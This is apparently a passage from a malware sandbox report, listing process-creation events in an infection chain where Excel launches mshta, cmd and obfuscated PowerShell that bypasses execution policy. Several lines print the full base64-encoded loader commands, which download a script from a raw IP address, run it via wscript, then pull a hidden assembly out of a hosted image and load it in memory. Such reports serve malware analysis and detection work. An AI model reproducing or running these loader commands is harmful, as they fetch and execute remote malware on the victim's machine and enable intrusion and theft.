rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
